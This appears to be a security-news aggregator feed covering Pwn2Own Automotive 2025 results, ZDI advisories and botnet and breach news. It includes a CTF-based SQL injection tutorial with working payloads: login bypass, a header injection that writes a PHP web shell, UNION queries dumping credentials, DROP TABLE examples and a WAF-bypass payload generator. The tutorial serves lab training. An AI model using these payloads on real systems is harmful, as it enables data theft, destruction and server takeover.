Pwn2Own Automotive 2025 - Day One ResultsWelcome to the first day of Pwn2Own Automotive 2025. We have 18 entries to go through today, and we will be updating the results here as we have them. SUCCESS - The team from PCAutomotive used a stack-based buffer overflow to gain code execution on the Alpine IVI. They earn $20,000 and two Master of Pwn points. SUCCESS - The team from Viettel Cyber Security used an OS command injection bug to exploit the #Kenwood IVI for code execution. They win $20,000 and 2 Master of Pwn points. SUCCESS - Cong Thanh (@ExLuck99) and Nam Dung (@greengrass19000) of ANHTUD used an integer overflow to gain code execution on the Sony XAV-AX8500. The earn themselves $20,000 and 2 Master of Pwn points. SUCCESS/COLLISION - Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) used a 3 bug combo to exploit the Phoenix Contact CHARX SEC-3150, but one was publicly known. He still earns $41,750 and 4.25 Master of Pwn points. SUCCESS/COLLISION - It took a while for us to confirm, but confirm we did! The team from Synacktiv used a stack-based buffer overflow plus a known bug in OCPP to exploit the ChargePoint with signal manipulation through the connector. They earn $47,500 and 4.75 Master of Pwn points. SUCCESS - The PHP Hooligans used a heap-based buffer overflow to exploit the Autel charger. They earn $50,000 and 5 Master of Pwn points. SUCCESS - The team from GMO Cybersecurity by Ierae, Inc. used a stack-based buffer overflow to to confirm their second round exploit of the Kenwood IVI. They earn $10,000 and 2 Master of Pwn points. SUCCESS - The Viettel Cyber Security (@vcslab) team used a stack-based buffer overflow to exploit the Alpine IVI. This second round win earns the $10,000 and 2 Master of Pwn points. SUCCESS - Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) proves he''s never going to give us up or let us down by using a hard-coded cryptographic key bug in the Ubiquiti charger. He earns himself $50,000 and 5 Master of Pwn points - putting him in the early lead. SUCCESS - It may have take 3 attempts, but it''s confirmed! Thanh Do (@nyanctl) of Team Confused used a heap-based buffer overflow to exploit the Sony IVI. His round 2 win nets him $10,000 and 2 Master of Pwn points. SUCCESS - After accessing an open port via power drill, Tobias Scharnowski (@ScepticCtf), Felix Buchmann (@diff_fusion), and Kristian Covic (@SeTcbPrivilege) of fuzzware.io leveraged a stack-based buffer overflow on the Autel MaxiCharger. Their second round win nets them $25,000 and 5 Master of Pwn points. COLLISION - Well that''s awkward. SK Shieldus (@EQSTLab) used a OS command injection bug, but it was one demonstrated in last year''s contest. Alpine chose not to patch it since ""in accordance with ISO21434...the vulnerability is classified as ''Sharing the Risk''."" Yikes. The SK Shieldus team earns $5,000 and 1 Master of Pwn point. Check out ZDI-24-846 for details on the original bug report. FAILURE - Unfortunately, Sina Kheirkhah (@SinSinology) could not get his exploit of the Sony IVI working within the time allotted. He still ends Day One of #Pwn2Own Automotive with $91,750 and 9.25 Master of Pwn points. SUCCESS - The Synacktiv (@Synacktiv) team used an OS command injection bug to exploit the Kenwood DMX958XR and play a video of the original Doom game. Their second round win earns them $10,000 and 2 Master of Pwn points. SUCCESS/COLLISION - Rob Blakely and Andres Campuzano of the Technical Debt Collectors used multiple bugs to exploit Automotive Grade Linux, but one of the bugs was previously known. They still earn $33,500 and 3.5 Master of Pwn points in the 1st PwnOwn attempt. SUCCESS - In our first Pwn2Own After Dark submission, Tobias Scharnowski (@ScepticCtf), Felix Buchmann (@diff_fusion), and Kristian Covic (@SeTcbPrivilege) of fuzzware.io leveraged an origin validation error bug to exploit the Phoenix Contact CHARX SEC-3150. The round 2 win earns them $25,000 and 5 Master of Pwn points. FAILURE - Unfortunately, Riccardo Mori of Quarkslab (@quarkslab) could not get his exploit of the Autel MaxiCharger AC Wallbox Commercial working within the time allotted. COLLISION - Bongeun Koo (@kiddo_pwn) of STEALIEN also used the bug exploited in the Alpine last year. He earns $5,000 and 1 Master of Pwn point - plus lots of style points for the Nyan Cat display. That wraps up Day 1 of #Pwn2Own Automotive 2025! In total, we awarded $382,750 for 16 unique 0-days. The team of Tobias Scharnowski (@ScepticCtf), Felix Buchmann (@diff_fusion), and Kristian Covic (@SeTcbPrivilege) of fuzzware.io is current in the lead for Master of Pwn, but Sina Kheirkhah (@SinSinology) is right on their heels. Stay tuned tomorrow for more results and surprises. #P2OAuto
by Zero Day Initiative Blog
2025-01-22 00:49:46
Trump Frees Silk Road Creator Ross Ulbricht After 11 Years in PrisonDonald Trump pardoned the creator of the world’s first dark-web drug market, who is now a libertarian cause célèbre in some parts of the crypto community.
by WIRED Security News
2025-01-22 00:32:46
BreachForums Admin Conor Fitzpatrick (Pompompurin) to Be ResentencedBreachForums admin Conor Fitzpatrick (Pompompurin) faces resentencing after his lenient 17-day sentence was vacated, highlighting the serious consequences…
by Hackread
2025-01-22 00:00:00
CrowdStrike Researchers Explore Contrastive Learning to Enhance Detection Against Emerging Malware Threats
by CrowdStrike
2025-01-22 00:00:00
ZDI-25-059: Siemens Tecnomatix Plant Simulation WRL File Parsing Stack-based Buffer Overflow Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Siemens Tecnomatix Plant Simulation. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-53041.
by Zero Day Initiative Advisories
2025-01-22 00:00:00
ZDI-25-058: Siemens Tecnomatix Plant Simulation WRL File Parsing Out-Of-Bounds Read Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Siemens Tecnomatix Plant Simulation. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-53242.
by Zero Day Initiative Advisories
2025-01-22 00:00:00
ZDI-25-057: Siemens Tecnomatix Plant Simulation WRL File Parsing Out-Of-Bounds Write Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Siemens Tecnomatix Plant Simulation. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-45471.
by Zero Day Initiative Advisories
2025-01-22 00:00:00
ZDI-25-056: Siemens Tecnomatix Plant Simulation WRL File Parsing Out-Of-Bounds Write Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Siemens Tecnomatix Plant Simulation. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-45469.
by Zero Day Initiative Advisories
2025-01-21 23:02:17
[Virtual Event]: Cybersecurity's Most Promising New and Emerging Technologies
by Dark Reading
2025-01-21 22:43:00
5 predictions channel partners need to know for 2025To help our partners prepare for 2025, we recently spoke to Greg Saenz, VP of Channels at Barracuda, to get his insights on what channel partners and MSPs should be thinking about to succeed in the year ahead.
by Barracuda
2025-01-21 22:25:25
Former CIA analyst pleaded guilty to leaking top-secret documentsA former CIA analyst, Asif William Rahman, pleaded guilty to leaking top-secret National Defense Information on social media in 2024. Asif William Rahman, a former CIA analyst with Top-Secret clearance since 2016, pleaded guilty to leaking classified information on social media in October 2024. Rahman has access to Sensitive Compartmented Information (SCI). On October 17, […]
by Security Affairs
2025-01-21 22:21:50
Trump Fires Cyber Safety Board Investigating Salt Typhoon HackersIn a letter sent today, the acting DHS secretary terminated membership to all advisory boards, including the Cyber Safety Review Board (CSRB) tasked with investigating state-sponsored cyber threats against the US.
by Dark Reading
2025-01-21 21:50:25
Email Bombing, 'Vishing'' Tactics Abound in Microsoft 365 AttacksSophos noted more than 15 attacks have been reported during the past three months.
by Dark Reading
2025-01-21 21:35:22
GDPR Compliance in the US: Checklist and RequirementsThe European Union (EU)’s General Data Protection Regulation (GDPR) isn’t just a European concern. As GDPR-U.S. interactions become more complex, international businesses (including American ones) must comply with this regulation when handling data from EU citizens. If your company collects, processes, or stores data from the EU or European Economic Area (EEA)—including Iceland, Norway, and Liechtenstein—GDPR compliance is a legal requirement.
by Legit Security
2025-01-21 21:34:03
AI Code Generation: The Risks and Benefits of AI in SoftwareAI code generation is changing how developers approach their work. Modern code completion AI tools like GitHub Copilot and ChatGPT offer faster development cycles, improved productivity, and the ability to automate repetitive tasks.
by Legit Security
2025-01-21 21:32:13
What PCI Attestation of Compliance Is and How to Get ItEvery time a customer swipes their credit card, they trust that business to protect their sensitive payment information against mishandling or fraud. But proving that trust in the right place requires certification.
by Legit Security
2025-01-21 21:30:33
Understanding the Principle of Least Privilege (PoLP)The rule of least privilege, also known as the principle of least privilege (PoLP), is a security measure for safeguarding sensitive systems and data. PoLP ensures that users, applications, and systems have only the minimum access necessary to perform their tasks. This least privilege access strategy reduces potential attack surfaces, limiting the damage from compromised accounts to enhance overall security.
by Legit Security
2025-01-21 21:15:18
DONOT Group Deploys Malicious Android Apps in IndiaThe advanced persistent threat (APT) group is likely India-based and targeting individuals with connections to the country''s intelligence community.
by Dark Reading
2025-01-21 20:38:02
Cybersecurity Expert Rachel Tobac to Keynote 2025 RH-ISAC Cyber Intelligence SummitVIENNA, VA (January 21, 2025) – The Retail & Hospitality Information Sharing and Analysis Center (RH-ISAC) is thrilled to announce that Rachel Tobac, renowned cybersecurity expert and CEO of SocialProof Security , will deliver the keynote address at the 2025 RH-ISAC Cyber Intelligence Summit, taking place 7–9 April, 2025, in St. Louis, Missouri. In her...
by RH-ISAC
2025-01-21 20:30:38
HPE Investigates After Alleged Data BreachThe company reports that it is not experiencing any operational issues within its business, so far.
by Dark Reading
2025-01-21 20:23:28
SQL Injection 101: Uncovering and Exploiting SQLi VulnerabilitiesIntroduction to SQL Injection What is SQL Injection and Its Types? To define SQL Injection in a single sentence attackers (hackers) inject malicious SQL queries to manipulate or access sensitive data from the database that is connected to the web application. Types of SQL Injection include: In-Band SQL Injection: Error-Based: Extracts information directly from database error messages. Union-Based: Combines multiple query results to fetch unauthorized data. Inferential (Blind) SQL Injection: Boolean-Based: Deduces information by observing differences in application responses based on true/false conditions. Time-Based: Exploits delays in server response times to infer database behavior. Out-of-Band SQL Injection: Uses alternate communication channels, such as DNS or HTTP requests, to exfiltrate data when direct interaction isn’t feasible. How to Test for SQL Injection? To detect and exploit SQL Injection vulnerabilities, follow these steps: Application Mapping: Identify input fields that interact with the database. Fuzzing the Application: Inject SQL-specific characters like '' or "" to trigger errors or anomalies. Use Boolean payloads such as OR 1=1 or OR 1=2 to test for logical conditions. Test time-based payloads (e.g., SLEEP(5)) to observe delays in responses. Deploy Out-of-Band payloads to monitor external server interactions. Analysis: Look for unusual behaviors, such as error messages, data leaks, or response delays, to confirm vulnerabilities. Automation Tools: Use tools like sqlmap, ghauri for systematic testing and enhanced detection accuracy. Image Credits goes to Rana Khalil SQL Injection techniques that I got to learn from CTFs 1.Sanitize {SQL AUTH-BYPASS} Lab Link 🔗: https://app.hackthebox.com/challenges/sanitize This is fun and easy challenge from hackthebox. We all have heard about using payloads like or 1=1 on youtube and various places. Now this challenge involves abusing this logic in order to bypass the login. Now with the following wordlist I had most amazing results in bypassing the login pages via SQL Injection during CTFs. Just capture the login request, and make sure you are using battering ram mode while fuzzing both the username and password fields. https://github.com/payloadbox/sql-injection-payload-list/blob/master/Intruder/exploit/Auth_Bypass.txt Payload: '' or 1=1 -- - 2. Intergalactic post {Sqli to RCE} Lab Link 🔗: https://app.hackthebox.com/challenges/Intergalactic%2520Post After a bit of trail and error we see that the website accepts input and often reders sql error. After a lot failing we come to realisation that what if we can access flag.txt via an RCE through SQL injection? Now we google the term Sqli to RCE The first thing that pops up is this repo and inside we get the following payload. Paylod 1: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md#remote-command-execution-using-sqlite-command---attach-database First let’s talk a bit about X-Forwarded header.The X-Forwarded header enables web services to discover the real client IP address when users access them through proxy servers or load balancers. The client sends this header as part of their request and systems typically record or process it for business analysis and security reasons. Because this header lacks validation controls attackers can use it to inject malicious SQL commands and scripts directly into backend systems and logs. Any program that accepts raw unfiltered information from this header exposes itself to injection threats. When attackers inject the X-Forwarded-For header they can launch attacks such as SQL injection and command injection by sending harmful strings including '' OR 1=1 -- and more. These harmful strings can cause significant damage to backend systems. These attacks can damage backend functions along with defeating IP security filters and targeting bad logging practices. The header works as a useful attack path because users rarely see it while testing creates an opportunity for attackers to identify backend system weaknesses. Now soon we realised that the base payload does not work so we will some additional headers which in our case is X-Forwarded header and let’s change the web directory and try different locations like /var/www or /var or /www. After trail and error we find the location to be /www Payload 2: X-Forwarded-For: blahblah'',''blahblah'');ATTACH DATABASE ''/www/lol.php'' as lol;CREATE TABLE lol.pwn(dataz text); INSERT INTO lol.pwn (dataz) VALUES (""<?php system($_GET[''cmd'']); ?>"");-- Notice that in our modified payload we are enclosing single quotes ($_GET[''cmd'']) inside the PHP code, as seen in the second payload, in first payload we used double quotes. Now we get RCE on the server. Once the SQL writes an malicious file on it’s web directory it’s time to get the flag. Finally we get the flag via RCE through SQL injection attack. 3. Picoctf : More SQLi {SQL auth-bypass + Manual SQL Injection on sqlite database} Lab Link 🔗: https://play.picoctf.org/practice/challenge/358?page=1&search=more%20sql Many including myself have underestimated the quality of good web based challenges in picoctf and by far this my personal favourite one. At first glances we are having a simple login page. Now let’s try to bypass the SQL logic with payloads like '' or 1=1 -- Upon unsuccessful login we get SQL error which confirms that this website might be vulnerable to SQL Injection. Time to fuzz for payloads that might work. I am using this wordlist for this task We found 14 payloads that are able to bypass the login logic. We will be sticking to this simple payload to bypass authentication / login via Sql Injection '' or true-- Now from here the real challenge starts. We are given an search bar, from which we are expected to get flag. STEP 1: Initial Testing for SQL Injection Inject a simple payload like '' or 123'' into the input field to check for errors. A SQL syntax error indicates the application may be vulnerable to SQLi. But in our case we don’t see any explicit error displayed by the web application STEP 2:Identify the Number of Columns Use the UNION SELECT statement to match the structure of the original query. For example: 123'' UNION SELECT null;-- -- 1 column 123'' UNION SELECT null, null;-- -- 2 columns 123'' UNION SELECT null, null, null;-- -- 3 columns Increase the number of null placeholders until the query executes without errors. This reveals the number of columns in the original query. Do note that sometimes in CTF null literally returns no value so feel free to use any words, string or any number instead of using null. STEP 3: Determine Data Types Replace null with test values (e.g., ''test'', 123, datetime(''now'')) to identify which columns accept which data types: 123'' UNION SELECT ''text'', null, null;-- -- Column 1 accepts strings 123'' UNION SELECT null, 123, null;-- -- Column 2 accepts numbers 123'' UNION SELECT null, null, datetime(''now'');-- -- Column 3 accepts dates In our case we have 3 columns and we have used the following payload to find the number of columns. cn'' UNION select 1,2,3-- Note that you can start the SQL injection query with any letter and character like cn'' or 123''. STEP 4: Extract Table Names Use SQLite’s sqlite_master table to enumerate all table names in the database: 123'' UNION SELECT tbl_name, null, null FROM sqlite_master WHERE type=''table'';-- This will list all table names in the database. STEP 5: Extract Column Names Once you identify a table (e.g., more_table), query the PRAGMA table_info() function or directly target sqlite_master to enumerate its columns: 123'' UNION SELECT sql, null, null FROM sqlite_master WHERE tbl_name=''more_table'';-- Alternatively: [Note that this does not work in our situation] PRAGMA table_info(''more_table''); STEP 6: Dump Data Now that you know the table (more_table) and its columns (flag), you can extract the data: 123'' UNION SELECT flag, null, null FROM more_table;-- 4. Understanding Second-Order SQL Injection: A Deep Dive Lab Link 🔗: https://tryhackme.com/r/room/advancedsqlinjection {Task 3} Second-order SQL injection, also known as stored SQL injection, is a subtle and dangerous attack vector where malicious input is stored in a database and executed later when that data is retrieved and used in a subsequent SQL query. Unlike classic SQL injection, the payload doesn’t execute immediately, making it harder to detect during initial testing. How It Happens In the provided example, user input is sanitized using real_escape_string() and stored in a database: $ssn = $conn->real_escape_string($_POST[''ssn'']); $book_name = $conn->real_escape_string($_POST[''book_name'']); $author = $conn->real_escape_string($_POST[''author'']); $sql = ""INSERT INTO books (ssn, book_name, author) VALUES (''$ssn'', ''$book_name'', ''$author'')""; At this stage, input like 12345''; UPDATE books SET book_name = ''Hacked''; -- is stored safely, appearing as normal data. However, during subsequent operations (e.g., when the stored book_name is fetched and used in a query without re-sanitization), the malicious payload is executed. Why It’s Dangerous Bypassing Front-End Validation: Input sanitization might be sufficient during initial storage, but improper handling during retrieval can reintroduce the attack. Delayed Impact: Since the malicious input is dormant until a later interaction, it often escapes detection during initial testing. Wide Attack Surface: Once stored, the payload can target multiple parts of the application when the data is reused. Real-World Scenario A stored payload like ''; DROP TABLE books; -- or 12345''; UPDATE books SET book_name = ''Hacked''; -- may not cause immediate errors but can compromise the database during future queries, leading to data manipulation or loss. 5. Simple SQL WAF bypassing Lab Link 🔗: https://tryhackme.com/r/room/advancedsqlinjection {Task 4} The SQL query is not executing correctly, which probably means there is a chance of SQL Injection. Let’s try to inject the payload “Intro to PHP'' OR 1=1”. We will get the following output: So, what is happening here? When this input is passed to the PHP script, the str_replace function will strip out the OR keyword and the single quote, resulting in a sanitised input that will not execute the intended SQL injection. This input is ineffective because the filtering removes the critical components needed for the SQL injection to succeed. SQL injection payloads often exploit filters by using URL-encoded characters to bypass keyword and symbol restrictions. For example, %27 represents a single quote (''), %20 encodes a space, and %2D%2D translates to --, which starts a SQL comment. In the payload 1%27%20||%201=1%20--+, the single quote (1'') closes the string, while || 1=1 introduces a condition that always evaluates to true. The -- comment ensures the database ignores any remaining SQL code, effectively bypassing restrictions and returning all records. Using encoding tools like CyberChef can help craft these payloads to evade filters. This technique manipulates the SQL query structure by encoding key characters, ensuring filters don’t recognize them as malicious. For example, if a query expects input like a book name, injecting Intro to PHP'' || 1=1 --+ (URL-encoded) forces the condition to evaluate to true, dumping all database records. URL encoding is crucial for bypassing filters while maintaining SQL syntax integrity, especially in environments where special characters or keywords are sanitized or blocked. Payload: http://10.10.255.153/encoding/search_books.php?book_name=Intro%20to%20PHP%27%20||%201=1%20--+ 6. Some more simple WAF bypasses Lab Link 🔗: https://tryhackme.com/r/room/advancedsqlinjection {Task 5} SQL injection defenses can often be bypassed by using creative obfuscation techniques. In scenarios where spaces or common SQL keywords like OR, AND, UNION, and SELECT are filtered, attackers can replace spaces with URL-encoded characters (e.g., %0A for line feed) or inline comments (/**/). Similarly, logical operators like || can substitute blocked keywords. The provided script demonstrates this approach by generating payloads that dynamically substitute placeholders ({space}, {op}) with bypass variants like %09, %0D, and ||. This adaptability is critical in real-world environments where filters vary, requiring pentesters to trial combinations and adjust strategies for effective exploitation Now let’s write an python script to automatically generate payloads that follow the above discussed bypasses in our payload to our SQL query. What this script will do is take any normal SQL payload like 1'' or 1=1-- . Now the problem with these times of payloads is that web application might logical operators like and , or and therefore we break down our payload that we need to encode in the following way. 1''{space}{op}{space}1=1{space}-- Here {space} means literal blank space, and {op} means operation like and, or. Below we have python script to encode basic payloads like the above mentioned one, but make sure you are explicitly mentioning {space} and {op} import sys def generate_payloads(base_payload, file_path=None): if not (''{space}'' in base_payload and ''{op}'' in base_payload): print(""Error: The base payload must include ''{space}'' and ''{op}'' placeholders."") return [] # Define common SQL injection techniques spaces = [''%09'', ''%0A'', ''%0C'', ''%0D'', ''%A0'', ''/**/''] operators = [''||'', ''&&'', ''|'', ''&''] # Generate payloads payloads = [] for s in spaces: for o in operators: payload = base_payload.format(space=s, op=o) # Add common variations to enhance payload effectiveness payloads.append(payload) payloads.append(payload + ""%27+"") # Appending to match your successful payload # Optionally write payloads to a file if file_path: try: with open(file_path, ''w'') as f: f.write(""\n"".join(payloads)) print(f""Payloads saved to {file_path}"") except Exception as e: print(f""Error writing to file: {e}"") else: # Output generated payloads in a clean format for Burp Suite print(""\nGenerated Payloads:\n"") print(""\n"".join(payloads)) return payloads if __name__ == ""__main__"": # Take input from user base_payload = input(""Enter the base payload (use ''{space}'' for space and ''{op}'' for operator placeholders):\n"") file_option = input(""Do you want to save the payloads to a file? (yes/no): "").strip().lower() file_path = None if file_option == ''yes'': file_path = input(""Enter the file path to save payloads: "").strip() generate_payloads(base_payload, file_path) Code execution might look something like the following: scripts on master via 🐍 v3.8.10 ❯ python3 basic-sqli-bypass.py Enter the base payload (use ''{space}'' for space and ''{op}'' for operator placeholders): 1''{space}{op}{space}1=1{space}-- Do you want to save the payloads to a file? (yes/no): no Generated Payloads: 1''%09||%091=1%09-- 1''%09||%091=1%09--%27+ 1''%09&&%091=1%09-- 1''%09&&%091=1%09--%27+ 1''%09|%091=1%09-- 1''%09|%091=1%09--%27+ 1''%09&%091=1%09-- 1''%09&%091=1%09--%27+ 1''%0A||%0A1=1%0A-- 1''%0A||%0A1=1%0A--%27+ 1''%0A&&%0A1=1%0A-- 1''%0A&&%0A1=1%0A--%27+ 1''%0A|%0A1=1%0A-- 1''%0A|%0A1=1%0A--%27+ 1''%0A&%0A1=1%0A-- 1''%0A&%0A1=1%0A--%27+ 1''%0C||%0C1=1%0C-- 1''%0C||%0C1=1%0C--%27+ 1''%0C&&%0C1=1%0C-- 1''%0C&&%0C1=1%0C--%27+ 1''%0C|%0C1=1%0C-- 1''%0C|%0C1=1%0C--%27+ 1''%0C&%0C1=1%0C-- 1''%0C&%0C1=1%0C--%27+ 1''%0D||%0D1=1%0D-- 1''%0D||%0D1=1%0D--%27+ 1''%0D&&%0D1=1%0D-- 1''%0D&&%0D1=1%0D--%27+ 1''%0D|%0D1=1%0D-- 1''%0D|%0D1=1%0D--%27+ 1''%0D&%0D1=1%0D-- 1''%0D&%0D1=1%0D--%27+ 1''%A0||%A01=1%A0-- 1''%A0||%A01=1%A0--%27+ 1''%A0&&%A01=1%A0-- 1''%A0&&%A01=1%A0--%27+ 1''%A0|%A01=1%A0-- 1''%A0|%A01=1%A0--%27+ 1''%A0&%A01=1%A0-- 1''%A0&%A01=1%A0--%27+ 1''/**/||/**/1=1/**/-- 1''/**/||/**/1=1/**/--%27+ 1''/**/&&/**/1=1/**/-- 1''/**/&&/**/1=1/**/--%27+ 1''/**/|/**/1=1/**/-- 1''/**/|/**/1=1/**/--%27+ 1''/**/&/**/1=1/**/-- 1''/**/&/**/1=1/**/--%27+ Once you get nice list of payloads, simply add these payloads to the intruder and start fuzzing, in our lab we found 5 new working payloads that can help us solve lab. Do make an important note that real life web applications are much more complex and we need sophisticated and reliable tools like sqlmap or ghauri to automate and evade web application defences. The goal of this section in this blog is to make us understand at an core level what and how we can really bypass web application protections, not to replicate real life scenario. Stay tuned for the upcoming blogs where we will discuss about the use of automation tools in SQL Injection 7. Header SQL Injection Lab Link 🔗: https://tryhackme.com/r/room/advancedsqlinjection {Task 7} Now this one is obvious just like header based XSS sometimes we can inject SQL Queries into the web application, which leads to SQL injection. In real life scenarios don’t forget to fuzz the http headers with SQL Injection payloads! Payload Used: '' UNION SELECT book_id, flag FROM books; # Now let’s inject this into the user-agent header. We will be using burp suite for this. After successfully injecting the SQL query we get the flag. Manual SQL Injection attacks demystified Lab Link 🔗: https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-oracle Note that techniques discussed in this applies for almost all of the databases except for oracle database. Since parameters and data is passed via GET we can directly start injecting payloads on the URL. First as always you can see if using any characters like '','''' or # is leading to any internal or data base error. Once it shows some obvious errors, now let’s go ahead and enumerate the columns in the database first so that we can start injecting SQL queries Enumerating the database Step 1: Find the number of columns present in the database https://0a5500ac03d8c8dc8241928700ed0080.web-security-academy.net/filter?category=Gifts%27+UNION+SELECT+%27null%27-- Now it’s been confirmed that this DB has more than one column now let’s try and see if the database has two columns. https://0a5500ac03d8c8dc8241928700ed0080.web-security-academy.net/filter?category=Gifts%27+UNION+SELECT+%27null%27,%27null%27-- ![[Pasted image 20250120231837.png]] Now this verifies that the database has 2 columns and now let’s try to find some juicy details Step 2: Determine the number of columns that are being returned by the query and which columns contain text data Verify that the query is returning two columns, both of which contain text, using a payload like the following in the category parameter: ''+UNION+SELECT+''abc'',''def''-- When we use the above payload we are able to verify that the both of the databases has column that has or accepts string data type. Step 3: Find the database version you are dealing with: Now for this we have remember that techniques discussed in the next section applies to most of databases except for oracle. When it does not apply for oracle we explicitly mention and discuss the payload that works for the oracle databases. ''+UNION+SELECT+@@version,+NULL# Make sure that you URL encode this payload and just remember espeically the special characters @@ and # are encoded with URL. Step 3: Manual database enumeration on oracle Initial enumeration we find that using '' results in internal error, and we can find and verify that this database has two columns. And we find that both the columns accept string datatype. Gifts''+UNION+SELECT+''null''-- Gifts''+UNION+SELECT+''null'',''null''-- ''+UNION+SELECT+''abc'',''def''-- Now the only tweaking we need to do for the payload to work is to mention and specify the database from which we are trying to mess around in our case it’s dual so let’s add it to our payload. ''+UNION+SELECT+''abc'',''def''+FROM+dual-- And now we see it works. Now finally we will use the following payload to get the database version on oracle. ''+UNION+SELECT+BANNER,+NULL+FROM+v$version-- Exploiting the database Step 4: List all the tables present in the database. Use the following payload to retrieve the list of tables in the database. Again do make a note that the following techniques work for almost all databases except for oracle When ever we need to change our payload so that it works on oracle databases we explicitly mention what works on oracle database ''+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables-- Note that for oracle databases the same payload will look something like this ''+UNION+SELECT+table_name,NULL+FROM+all_tables-- Find the name of the table containing user credentials. Feel free to search on web page using ctrl+f. Step 5: List all the columns present inside the table we want to dump the data. Use the following payload (replacing the table name) to retrieve the details of the columns in the table: ''+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name=''users_pewrif''-- For oracle payload will be something similar to the below following. Note that we will be using all_tab_columns instead of information_schema. ''+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name=''USERS_ABCDEF''-- Find the names of the columns containing usernames and passwords. Step 6: Dump the data present in the columns, from the table Use the following payload (replacing the table and column names) to retrieve the usernames and passwords for all users: ''+UNION+SELECT+username_phrgmq,+password_tyyaor+FROM+users_pewrif-- For oracle databses the payload will be the same, no changes, just specify the columns and table name correctly. Find the password for the administrator user, and use it to log in. Some additional TRYHACKME free rooms for extra practice on SQL Injection: https://tryhackme.com/r/room/advancedsqlinjection https://tryhackme.com/r/room/sch3mad3mon https://tryhackme.com/r/room/sqhell https://tryhackme.com/r/room/sqlilab https://tryhackme.com/r/room/rabbitholeqq Some good blogs on SQL injection: https://infosecwriteups.com/the-wrath-of-second-order-sql-injection-c9338a51c6d https://www.intigriti.com/researchers/blog/hacking-tools/hacker-tools-sqlmap-finding-sqli-like-a-pro
by HACKLIDO
2025-01-21 20:06:40
Govtech giant Conduent won’t rule out cyberattack as outage drags onAt least four states reported being affected by the outage, which Conduent says is ongoing. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2025-01-21 19:30:00
Mirai Variant Murdoc Botnet Exploits AVTECH IP Cameras and Huawei RoutersCybersecurity researchers have warned of a new large-scale campaign that exploits security flaws in AVTECH IP cameras and Huawei HG532 routers to rope the devices into a Mirai botnet variant dubbed Murdoc Botnet. The ongoing activity ""demonstrates enhanced capabilities, exploiting vulnerabilities to compromise devices and establish expansive botnet networks,"" Qualys security researcher Shilpesh
by The Hacker News
2025-01-21 19:15:33
Redline, Vidar and Raccoon Malware Stole 1 Billion Passwords in 2024Specops 2025 Breached Password Report reveals over 1 billion passwords stolen by malware in the past year, exposing…
by Hackread
2025-01-21 18:16:00
13,000 MikroTik Routers Hijacked by Botnet for Malspam and CyberattacksA global network of about 13,000 hijacked Mikrotik routers has been employed as a botnet to propagate malware via spam campaigns, the latest addition to a list of botnets powered by MikroTik devices. The activity ""take[s] advantage of misconfigured DNS records to pass email protection techniques,"" Infoblox security researcher David Brunsdon said in a technical report published last week. ""This
by The Hacker News
2025-01-21 18:09:18
Mirai Botnet Spinoffs Unleash Global Wave of DDoS AttacksTwo separate campaigns are targeting flaws in various IoT devices globally, with the goal of compromising them and propagating malware worldwide.
by Dark Reading
2025-01-21 17:02:00
How to tell if an AirTag is secretly tracking you - and what to do about itApple''s trackers have been misused to track some without their consent. Here''s how to check if an AirTag is tracking you, whether you use an iPhone or Android phone. Plus, what to do next if you find one.
by ZDNET Security
2025-01-21 17:00:00
Why maintaining data cleanliness is essential to cybersecurityData, in all its shapes and forms, is one of the most critical assets a business possesses. Not only does it provide organizations with critical information regarding their systems and processes, but it also fuels growth and enables better decision-making on all levels. However, like any other piece of company equipment, data can degrade over […] The post Why maintaining data cleanliness is essential to cybersecurity appeared first on Security Intelligence.
by Security Intelligence
2025-01-21 16:51:58
Cloudflare Reports Record-Breaking 5.6 Tbps DDoS AttackCloudflare has revealed that it mitigated the largest Distributed Denial-of-Service (DDoS) attack ever recorded, peaking at 5.6 Terabits per second (Tbps) during the last quarter of 2024. This hyper-volumetric attack, alongside a staggering 53% annual increase in DDoS incidents, underscores the growing scale and sophistication of cyber threats worldwide. The attack on October 29, 2024, … The post Cloudflare Reports Record-Breaking 5.6 Tbps DDoS Attack appeared first on CyberInsider.
by Cyber Insider
2025-01-21 16:48:11
TikTok Alternative ‘RedNote’ Is Leaking User Data in PlaintextA security investigation has revealed that Xiaohongshu, also known as RedNote, a social media platform similar to TikTok, transmits user data in plaintext, exposing users'' viewing and search histories to potential eavesdroppers. The flaw, discovered by security researchers at Corrata, highlights ongoing concerns about data security on Chinese-owned digital platforms, particularly as American users seek … The post TikTok Alternative ‘RedNote’ Is Leaking User Data in Plaintext appeared first on CyberInsider.
by Cyber Insider
2025-01-21 16:41:05
New Mirai botnet variant Murdoc Botnet targets AVTECH IP cameras and Huawei HG532 routersResearchers warn of a campaign exploiting AVTECH IP cameras and Huawei HG532 routers to create a Mirai botnet variant called Murdoc Botnet. Murdoc Botnet is a new Mirai botnet variant that targets vulnerabilities in AVTECH IP cameras and Huawei HG532 routers, the Qualys Threat Research Unit reported. The botnet has been active since at least […]
by Security Affairs
2025-01-21 16:22:00
